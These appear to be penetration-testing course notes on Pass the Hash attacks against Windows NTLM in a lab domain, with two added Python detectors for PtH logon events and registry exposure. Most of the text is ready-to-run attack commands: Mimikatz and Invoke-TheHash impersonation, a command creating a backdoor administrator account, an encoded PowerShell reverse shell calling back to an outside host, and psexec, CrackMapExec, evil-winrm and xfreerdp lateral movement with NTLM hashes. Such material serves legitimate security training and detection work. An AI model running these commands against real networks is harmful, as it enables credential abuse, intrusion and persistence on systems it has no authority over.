A Pass the Hash (PtH) attack is a technique in which an attacker authenticates with a user's password hash (NTLM) instead of the plaintext password.

PtH attacks exploit the authentication protocol itself: the NTLM challenge-response only proves knowledge of the hash, not of the password, so possessing the hash is enough to authenticate.


Windows NTLM Introduction

Microsoft's Windows New Technology LAN Manager (NTLM) is a set of security protocols that authenticates users' identities while also protecting the integrity and confidentiality of their data. NTLM is a single sign-on (SSO) solution that uses a challenge-response protocol to verify the user's identity without transmitting the user's password over the network.

Kerberos replaced NTLM as the default authentication mechanism starting with Windows 2000 and subsequent Active Directory (AD) domains, but NTLM is still supported and widely used.

With NTLM, the password hashes stored on the server and domain controller are not salted, so the hash of a given password is identical everywhere and can be used directly in place of the password.

Pass the Hash with Mimikatz (Windows)

sekurlsa::pth

To use the sekurlsa::pth module, we will need the following:

  • /user - The user name we want to impersonate.
  • /rc4 or /NTLM - NTLM hash of the user’s password.
  • /domain - Domain the user to impersonate belongs to. In the case of a local user account, we can use the computer name, localhost, or a dot (.).
  • /run - The program we want to run with the user’s context (if not specified, it will launch cmd.exe).

Pass the Hash from Windows Using Mimikatz:

mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit

Pass the Hash with PowerShell Invoke-TheHash (Windows)

Invoke-TheHash is a collection of PowerShell functions for performing Pass the Hash attacks with WMI and SMB.

Local administrator privileges are not required client-side, but the user and hash we use to authenticate need to have administrative rights on the target computer.

To use this tool, we need to specify the following parameters to execute commands in the target computer:

  • Target - Hostname or IP address of the target.
  • Username - Username to use for authentication.
  • Domain - Domain to use for authentication. This parameter is unnecessary with local accounts or when using the @domain after the username.
  • Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format.
  • Command - Command to execute on the target. If a command is not specified, the function will check to see if the username and hash have access to WMI on the target.

On a Windows-based attacker machine:

Import-Module .\Invoke-TheHash.psd1
 
Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose

Invoke-TheHash with WMI

Import-Module .\Invoke-TheHash.psd1

The same module can also run a reverse shell payload (here a base64-encoded PowerShell command) on the target:

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwAzACIALAA4ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
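As an added, defender-side example (not part of the original notes), the following Python flags the logon events that the Mimikatz and Invoke-TheHash techniques above leave in the Windows Security log: a type 9 (NewCredentials) logon through seclogo on the source host, and NTLM network logons with a local account on the target. The sample 4624 records and the hostname MS01 are constructed for the example.

```python
# Constructed sample records modelled on Windows Security event 4624 (not real
# logs); only the fields that matter for spotting Pass-the-Hash logons are kept.
SAMPLE_EVENTS = [
    # source-side footprint of sekurlsa::pth: NewCredentials (type 9) via seclogo
    {"EventID": 4624, "LogonType": 9, "LogonProcessName": "seclogo",
     "AuthenticationPackageName": "Negotiate", "TargetUserName": "julio",
     "TargetDomainName": "inlanefreight", "IpAddress": "::1"},
    # target-side footprint: NTLM network logon with the host's own local admin
    {"EventID": 4624, "LogonType": 3, "LogonProcessName": "NtLmSsp",
     "AuthenticationPackageName": "NTLM", "TargetUserName": "Administrator",
     "TargetDomainName": "MS01", "IpAddress": "10.129.201.200"},
    # benign: interactive console logon
    {"EventID": 4624, "LogonType": 2, "LogonProcessName": "User32",
     "AuthenticationPackageName": "Negotiate", "TargetUserName": "mark",
     "TargetDomainName": "INLANEFREIGHT", "IpAddress": "-"},
    # benign: Kerberos network logon by a domain account
    {"EventID": 4624, "LogonType": 3, "LogonProcessName": "Kerberos",
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "svc_backup",
     "TargetDomainName": "INLANEFREIGHT", "IpAddress": "172.16.1.20"},
]

def classify_logon(event, local_hostname):
    """Return a finding label for one 4624 record, or None when it looks benign."""
    if event.get("EventID") != 4624:
        return None
    ltype = event.get("LogonType")
    proc = event.get("LogonProcessName", "").lower()
    pkg = event.get("AuthenticationPackageName", "")
    domain = event.get("TargetDomainName", "")
    # sekurlsa::pth creates a NewCredentials logon through the seclogo logon
    # process; runas /netonly does the same, so treat this as a lead, not proof.
    if ltype == 9 and proc == "seclogo" and pkg == "Negotiate":
        return "NewCredentials logon via seclogo (possible sekurlsa::pth)"
    # A network logon that used NTLM for one of this host's own local accounts
    # is what Invoke-SMBExec, psexec or crackmapexec with -d . leave behind.
    if ltype == 3 and pkg == "NTLM" and domain.lower() == local_hostname.lower():
        return "NTLM network logon with local account (possible PtH)"
    return None

def find_pth_candidates(events, local_hostname):
    """Return (TargetUserName, IpAddress, label) for every suspicious record."""
    findings = []
    for ev in events:
        label = classify_logon(ev, local_hostname)
        if label:
            findings.append((ev["TargetUserName"], ev["IpAddress"], label))
    return findings
```

Run it against records exported from the host being reviewed, passing that host's own name so local-account NTLM logons are distinguished from domain ones.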

Pass the Hash with Impacket (Linux)

impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

There are several other tools in the Impacket toolkit we can use for command execution using Pass the Hash attacks, such as:

Pass the Hash with CrackMapExec (Linux)

crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453
  • --local-auth : perform the same actions but authenticate to each host in the subnet with a local account (for example the local administrator password hash) instead of a domain account
  • -x : execute a command on every host where authentication succeeds

If the same local administrator hash works across many hosts on a real-world engagement, a great recommendation for the customer is to implement the Local Administrator Password Solution (LAPS), which randomizes the local administrator password on each host and can be configured to rotate it on a fixed interval.

CrackMapExec - Command Execution

crackmapexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami

Pass the Hash with evil-winrm (Linux)

evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

PowerShell remoting

evil-winrm connects over PowerShell remoting (WinRM). If SMB is blocked or we don't have administrative rights, we can use this alternative protocol to connect to the target machine.

When using a domain account, we need to include the domain name, for example: administrator@inlanefreight.htb

Pass the Hash with RDP (Linux)

We can perform an RDP PtH attack to gain GUI access to the target system using tools like xfreerdp.

There are a few caveats to this attack:

  • Restricted Admin Mode, which is disabled by default, should be enabled on the target host

This can be enabled by adding a new registry value DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa with the data 0. It can be done using the following command:

Enable Restricted Admin Mode to Allow PtH

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Pass the Hash Using RDP

xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B

UAC Limits Pass the Hash for Local Accounts

UAC (User Account Control) limits the ability of local users to perform remote administration operations.

If HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy is set to 0, only the built-in local admin account (RID 500, “Administrator”) is allowed to perform remote administration tasks. Setting it to 1 allows the other local admins as well.

There is one exception: if the registry value FilterAdministratorToken (disabled by default) is enabled (value 1), the RID 500 account (even if it has been renamed) is enrolled in UAC protection. This means that remote PtH will fail against the machine when using that account.

These settings apply only to local administrative accounts. If we get access to a domain account with administrative rights on a computer, we can still use Pass the Hash against that computer. Reference on LocalAccountTokenFilterPolicy: “Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy”.
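As an added example (not from the original notes), this Python audit parses reg query output for the Restricted Admin and UAC values discussed in the RDP and UAC sections above and reports which remote PtH paths the host's configuration leaves open. The registry output is constructed for the example, and the function names are assumptions.

```python
import re

# Constructed `reg query` output for the values discussed above (not captured
# from a real host); the key lines are included so the parser sees real layout.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x1
    LocalAccountTokenFilterPolicy    REG_DWORD    0x1
    FilterAdministratorToken    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
    DisableRestrictedAdmin    REG_DWORD    0x0
"""

# One `reg query` value line: name, REG_DWORD, hex data.
DWORD_LINE = re.compile(r"^\s*(\w+)\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$", re.MULTILINE)

def parse_reg_dwords(text):
    """Map REG_DWORD value names to integers; values absent from the output stay absent."""
    return {name: int(data, 16) for name, data in DWORD_LINE.findall(text)}

def local_admin_remote_token(values, is_rid500):
    """True when a local admin receives an unfiltered token over the network,
    i.e. remote PtH with that account works. Rules as stated in the text above;
    a value missing from the registry means the Windows default (0)."""
    if values.get("LocalAccountTokenFilterPolicy", 0) == 1:
        return True   # every local admin, RID 500 included
    if is_rid500:
        # RID 500 is exempt from filtering unless FilterAdministratorToken=1
        return values.get("FilterAdministratorToken", 0) == 0
    return False      # other local admins only get a filtered token

def audit_pth_exposure(reg_output):
    """Summarise which PtH paths the registry configuration leaves open."""
    v = parse_reg_dwords(reg_output)
    # Restricted Admin mode is off unless DisableRestrictedAdmin exists and is 0,
    # so RDP PtH (xfreerdp /pth) only works when the value is present and 0.
    rdp_open = v.get("DisableRestrictedAdmin", 1) == 0
    return {
        "rid500_remote_admin": local_admin_remote_token(v, True),
        "other_local_admins_remote_admin": local_admin_remote_token(v, False),
        "rdp_restricted_admin_pth": rdp_open,
    }

if __name__ == "__main__":
    for check, exposed in audit_pth_exposure(SAMPLE_REG_OUTPUT).items():
        print(f"{check}: {'EXPOSED' if exposed else 'ok'}")
```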